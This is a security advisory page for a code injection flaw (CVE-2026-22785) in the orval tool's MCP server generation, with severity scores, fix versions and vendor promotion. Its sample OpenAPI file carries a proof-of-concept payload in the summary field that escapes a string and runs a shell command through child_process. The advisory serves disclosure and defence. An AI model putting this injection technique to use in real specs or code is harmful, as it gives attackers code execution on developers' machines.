CVE

GHSA-mwr6-3gp8-9jmj

orval MCP client is vulnerable to a code injection attack.

CVE

GHSA-mwr6-3gp8-9jmj

orval MCP client is vulnerable to a code injection attack.

Impact

The MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to "break out" of the string literal and inject arbitrary code.

Here is an example OpenAPI with the exploit

```yaml

openapi: 3.0.4

info:

title: Swagger Petstore - OpenAPI 3.0

description: |-

This is a sample Pet Store Server based on the OpenAPI 3.0 specification. You can find out more about

Swagger at https://swagger.io. In the third iteration of the pet store, we've switched to the design first approach!

You can now help us improve the API whether it's by making changes to the definition itself or to the code.

That way, with time, we can improve the API in general, and expose some of the new features in OAS3.

Some useful links:

- The Pet Store repository
- The source API definition for the Pet Store

termsOfService: https://swagger.io/terms/

contact:

email: apiteam@swagger.io

license:

name: Apache 2.0

url: https://www.apache.org/licenses/LICENSE-2.0.html

version: 1.0.27-SNAPSHOT

externalDocs:

description: Find out more about Swagger

url: https://swagger.io

servers:

url: https://petstore3.swagger.io/api/v3

tags:

name: pet

description: Everything about your Pets

externalDocs:

description: Find out more

url: https://swagger.io

name: store

description: Access to Petstore orders

externalDocs:

description: Find out more about our store

url: https://swagger.io

name: user

description: Operations about user

paths:

/pet/findByStatus:

get:

tags:

- - pet

summary: Finds Pets by status.' + require('child_process').execSync("open -a Calculator").toString(),//

description: Multiple status values can be provided with comma separated strings.

operationId: findPetsByStatus

parameters:

- - name: status

in: query

description: Status values that need to be considered for filter

schema:

type: string

responses:

'200':

description: successful operation

content:

application/json:

schema:

type: string

'400':

description: Invalid status value

default:

description: Unexpected error

security:

- - petstore_auth:
    - write:pets
    - read:pets

```

Patches

This is fixed in version 7.18.0 or higher

Workarounds

Do check your generated OpenAPI yaml/json before running through Orval CLI and correct it if it has injection.

Package Versions Affected

No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading

Detect compatible fix

Apply safe remediation

Fix with a single pull request

CVSS Version

9.3

4.0

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

9.8

3.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Related Resources

No items found.

References

https://github.com/orval-labs/orval/security/advisories/GHSA-mwr6-3gp8-9jmj, https://nvd.nist.gov/vuln/detail/CVE-2026-22785, https://github.com/orval-labs/orval/commit/80b5fe73b94f120a3a5561952d6d4b0f8d7e928d, https://github.com/orval-labs/orval

Severity

9.8

CVSS Score

Basic Information

Ecosystem

Base CVSS

9.8

EPSS Probability

0.00047%

EPSS Percentile

0.14702%

Introduced Version

0,7.9.0,8.0.0-rc.0

Fix Available

7.18.0,8.0.0-rc.6

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.

Fix Without Upgrading

Get a Demo

Let's Patch It!

GHSA-mwr6-3gp8-9jmj